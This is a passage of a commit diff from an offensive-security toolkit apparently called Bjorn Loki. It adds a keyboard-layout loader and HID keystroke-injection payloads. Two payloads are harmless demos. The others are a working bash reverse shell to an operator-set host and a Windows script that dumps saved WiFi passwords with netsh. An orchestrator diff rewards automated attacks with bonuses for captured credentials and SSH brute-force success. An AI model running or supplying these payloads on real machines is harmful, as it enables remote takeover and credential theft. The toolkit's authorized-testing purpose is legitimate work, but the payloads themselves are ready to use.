with open(path, "r") as f:
data = json.load(f)
_cache[name] = data
logger.debug("Loaded keyboard layout '%s' (%d chars)", name, len(data))
return data
def available() -> list:
"""List available layout names."""
layouts = []
for f in os.listdir(_LAYOUT_DIR):
if f.endswith(".json"):
layouts.append(f[:-5])
return sorted(layouts)

41
loki/layouts/us.json Normal file
View File

@@ -0,0 +1,41 @@
{
"a": [0, 4], "b": [0, 5], "c": [0, 6], "d": [0, 7],
"e": [0, 8], "f": [0, 9], "g": [0, 10], "h": [0, 11],
"i": [0, 12], "j": [0, 13], "k": [0, 14], "l": [0, 15],
"m": [0, 16], "n": [0, 17], "o": [0, 18], "p": [0, 19],
"q": [0, 20], "r": [0, 21], "s": [0, 22], "t": [0, 23],
"u": [0, 24], "v": [0, 25], "w": [0, 26], "x": [0, 27],
"y": [0, 28], "z": [0, 29],
"A": [2, 4], "B": [2, 5], "C": [2, 6], "D": [2, 7],
"E": [2, 8], "F": [2, 9], "G": [2, 10], "H": [2, 11],
"I": [2, 12], "J": [2, 13], "K": [2, 14], "L": [2, 15],
"M": [2, 16], "N": [2, 17], "O": [2, 18], "P": [2, 19],
"Q": [2, 20], "R": [2, 21], "S": [2, 22], "T": [2, 23],
"U": [2, 24], "V": [2, 25], "W": [2, 26], "X": [2, 27],
"Y": [2, 28], "Z": [2, 29],
"1": [0, 30], "2": [0, 31], "3": [0, 32], "4": [0, 33],
"5": [0, 34], "6": [0, 35], "7": [0, 36], "8": [0, 37],
"9": [0, 38], "0": [0, 39],
"!": [2, 30], "@": [2, 31], "#": [2, 32], "$": [2, 33],
"%": [2, 34], "^": [2, 35], "&": [2, 36], "*": [2, 37],
"(": [2, 38], ")": [2, 39],
"\n": [0, 40], "\r": [0, 40],
"\t": [0, 43],
" ": [0, 44],
"-": [0, 45], "_": [2, 45],
"=": [0, 46], "+": [2, 46],
"[": [0, 47], "{": [2, 47],
"]": [0, 48], "}": [2, 48],
"\\": [0, 49], "|": [2, 49],
";": [0, 51], ":": [2, 51],
"'": [0, 52], "\"": [2, 52],
"`": [0, 53], "~": [2, 53],
",": [0, 54], "<": [2, 54],
".": [0, 55], ">": [2, 55],
"/": [0, 56], "?": [2, 56]
}

View File

@@ -0,0 +1,9 @@
// Hello World — Test payload that types a message in Notepad (Windows)
layout('us');
delay(1000);
press("GUI r");
delay(500);
type("notepad\n");
delay(1000);
type("Hello from Bjorn Loki!\n");
type("HID injection is working.\n");

View File

@@ -0,0 +1,13 @@
// Reverse Shell (Linux) — Bash reverse TCP. Set LHOST/LPORT before use.
// WARNING: For authorized penetration testing only.
var LHOST = "CHANGE_ME";
var LPORT = "4444";
layout('us');
delay(1000);
// Open terminal (Ctrl+Alt+T is common on Ubuntu/Debian)
press("CTRL ALT t");
delay(1500);
type("bash -i >& /dev/tcp/" + LHOST + "/" + LPORT + " 0>&1\n");

View File

@@ -0,0 +1,6 @@
// Rickroll — Opens browser to a famous URL (harmless test)
layout('us');
delay(1000);
press("GUI r");
delay(500);
type("https://www.youtube.com/watch?v=dQw4w9WgXcQ\n");

View File

@@ -0,0 +1,20 @@
// WiFi Profile Exfiltration (Windows) — Dumps saved WiFi passwords via netsh
// WARNING: For authorized penetration testing only.
layout('us');
delay(1000);
// Open CMD
press("GUI r");
delay(500);
type("cmd\n");
delay(1000);
// Export all WiFi profiles with keys to a file
type("netsh wlan export profile key=clear folder=C:\\Users\\Public\n");
delay(3000);
// Show WiFi passwords inline
type("for /f \"tokens=2 delims=:\" %a in ('netsh wlan show profiles ^| findstr \"Profile\"') do @netsh wlan show profile name=%a key=clear 2>nul | findstr \"Key Content\"\n");
delay(5000);
console.log("WiFi profiles exported to C:\\Users\\Public");

View File

@@ -345,16 +345,12 @@ class Orchestrator:
return 0.0
# Base reward
reward = 50.0 if success else -5.0
if not success:
# Penalize time waste on failure
reward -= (duration * 0.1)
return reward
base_reward = 50.0 if success else -5.0
# ─────────────────────────────────────────────────────────
# Check for credentials found (high value!)
# Credential bonus (high value!)
# ─────────────────────────────────────────────────────────
credential_bonus = 0.0
try:
recent_creds = self.shared_data.db.query("""
SELECT COUNT(*) as cnt FROM creds
@@ -364,43 +360,123 @@ class Orchestrator:
if recent_creds and recent_creds[0]['cnt'] > 0:
creds_count = recent_creds[0]['cnt']
reward += 100 * creds_count # 100 per credential!
logger.info(f"RL: +{100*creds_count} reward for {creds_count} credentials")
credential_bonus = 100.0 * creds_count
logger.info(f"RL: +{credential_bonus:.0f} reward for {creds_count} credentials")
except Exception as e:
logger.error(f"Error checking credentials: {e}")
# ─────────────────────────────────────────────────────────
# Check for new services discovered
# Information gain reward (always positive, even on failure)
# ─────────────────────────────────────────────────────────
info_gain = 0.0
try:
# Compare ports before/after
ports_before = set(state_before.get('ports', []))
ports_after = set(state_after.get('ports', []))
new_ports = ports_after - ports_before
if new_ports:
reward += 15 * len(new_ports)
logger.info(f"RL: +{15*len(new_ports)} reward for {len(new_ports)} new ports")
info_gain += 15 * len(new_ports)
logger.info(f"RL: +{15*len(new_ports)} info_gain for {len(new_ports)} new ports")
except Exception as e:
logger.error(f"Error checking new ports: {e}")
# ─────────────────────────────────────────────────────────
# Time efficiency bonus/penalty
# ─────────────────────────────────────────────────────────
time_bonus = 0.0
if duration < 30:
reward += 20 # Fast execution bonus
time_bonus = 20.0
elif duration > 120:
reward -= 10 # Slow execution penalty
time_bonus = -10.0
# ─────────────────────────────────────────────────────────
# Action-specific bonuses
# ─────────────────────────────────────────────────────────
if action_name == "SSHBruteforce" and success:
# Extra bonus for SSH success (difficult action)
reward += 30
credential_bonus += 30.0
logger.debug(f"RL Reward calculated: {reward:.1f} for {action_name}")
return reward
# ─────────────────────────────────────────────────────────
# AI-02: Novelty bonus - reward exploring un-tried action+host combos
# ─────────────────────────────────────────────────────────
novelty_bonus = 0.0
try:
attempt_count = self._get_action_attempt_count(action_name, mac)
if attempt_count <= 1:
novelty_bonus = 10.0 # first try bonus
elif attempt_count <= 3:
novelty_bonus = 5.0 # still exploring
except Exception as e:
logger.debug(f"Novelty bonus calculation error: {e}")
# ─────────────────────────────────────────────────────────
# AI-02: Diminishing returns - penalize repeating same failed action
# ─────────────────────────────────────────────────────────
repeat_penalty = 0.0
if not success:
try:
consecutive_fails = self._get_consecutive_fail_count(action_name, mac)
repeat_penalty = min(consecutive_fails * 5.0, 25.0) # cap at -25
except Exception as e:
logger.debug(f"Repeat penalty calculation error: {e}")
# ─────────────────────────────────────────────────────────
# AI-02: Duration-proportional partial credit for failed actions
# ─────────────────────────────────────────────────────────
partial_credit = 0.0
if not success and duration > 5:
partial_credit = min(duration * 0.5, 10.0) # cap at +10
total_reward = (
base_reward
+ credential_bonus
+ info_gain
+ time_bonus
+ novelty_bonus
- repeat_penalty
+ partial_credit
)
logger.debug(
f"RL Reward: {total_reward:.1f} for {action_name} "
f"(base={base_reward:.0f} cred={credential_bonus:.0f} info={info_gain:.0f} "
f"time={time_bonus:.0f} novelty={novelty_bonus:.0f} "
f"repeat_pen={repeat_penalty:.0f} partial={partial_credit:.1f})"
)
return total_reward
def _get_action_attempt_count(self, action_name: str, mac: str) -> int:
"""AI-02: Get the total number of times this action was tried on this host."""
try:
rows = self.shared_data.db.query(
"SELECT COUNT(*) AS cnt FROM ml_features WHERE action_name=? AND mac_address=?",
(action_name, mac),
)
return int(rows[0]['cnt']) if rows else 0
except Exception as e:
logger.debug(f"_get_action_attempt_count error: {e}")
return 0
def _get_consecutive_fail_count(self, action_name: str, mac: str) -> int:
"""AI-02: Count consecutive failures for this action+host, most recent first."""
try:
rows = self.shared_data.db.query(
"""
SELECT success FROM ml_features
WHERE action_name=? AND mac_address=?
ORDER BY timestamp DESC
LIMIT 10
""",
(action_name, mac),
)
count = 0
for r in rows:
if int(r['success']) == 0:
count += 1
else:
break
return count
except Exception as e:
logger.debug(f"_get_consecutive_fail_count error: {e}")
return 0
def execute_queued_action(self, queued_action: Dict[str, Any]) -> bool:
"""Execute a single queued action with RL integration"""
@@ -568,6 +644,16 @@ class Orchestrator:
self.shared_data.db.update_queue_status(queue_id, 'failed')
logger.warning(f"Action {action_name} failed for {ip}")
# Circuit breaker feedback (ORCH-01)
try:
cb_threshold = int(getattr(self.shared_data, 'circuit_breaker_threshold', 3))
if success:
self.shared_data.db.record_circuit_breaker_success(action_name, mac)
else:
self.shared_data.db.record_circuit_breaker_failure(action_name, mac, threshold=cb_threshold)
except Exception as cb_err:
logger.debug(f"Circuit breaker update skipped: {cb_err}")
except Exception as e:
logger.error(f"Error executing action {action_name}: {e}")
self.shared_data.db.update_queue_status(queue_id, 'failed', str(e))
@@ -633,6 +719,23 @@ class Orchestrator:
logger.debug(f"Features logged for {action_name} (mode={self.shared_data.operation_mode})")
# AI-03: Feed reward to AI engine for performance tracking
if self.ai_engine:
try:
self.ai_engine.record_reward(reward)
except Exception as e:
logger.debug(f"AI reward recording skipped: {e}")
# AI-04: Update bootstrap scores for cold-start learning
if self.ai_engine:
try:
state_after = self._build_host_state(mac)
ports = set(state_after.get('ports', []))
port_profile = self.ai_engine._detect_port_profile(ports)
self.ai_engine.update_bootstrap(action_name, port_profile, reward)
except Exception as e:
logger.debug(f"Bootstrap update skipped: {e}")
except Exception as e:
logger.info_throttled(
f"Feature logging skipped: {e}",
@@ -674,6 +777,15 @@ class Orchestrator:
# Execute the action
self.execute_queued_action(next_action)
# If exit was requested during execution, reset status
# immediately so the UI doesn't stay on the finished action.
if self.shared_data.orchestrator_should_exit:
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text = "IDLE"
self.shared_data.bjorn_status_text2 = ""
self.shared_data.action_target_ip = ""
self.shared_data.active_action = None
else:
# IDLE mode
idle_time += 1
@@ -704,6 +816,16 @@ class Orchestrator:
time.sleep(self._loop_error_backoff)
self._loop_error_backoff = min(self._loop_error_backoff * 2.0, 10.0)
# ── Reset status immediately upon exit ──────────────────────
# This ensures the UI shows IDLE as soon as the orchestrator stops,
# regardless of whether Bjorn.stop_orchestrator()'s join() timed out.
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text = "IDLE"
self.shared_data.bjorn_status_text2 = ""
self.shared_data.action_target_ip = ""
self.shared_data.active_action = None
self.shared_data.update_status("IDLE", "")
# Cleanup on exit (OUTSIDE while loop)
if self.scheduler:
self.scheduler.stop()

Binary file not shown.

After

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 158 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 134 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 446 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 670 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 938 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 670 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 4.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.4 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 134 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 670 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 950 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 29 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.3 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 174 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.3 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.3 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.3 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Some files were not shown because too many files have changed in this diff Show More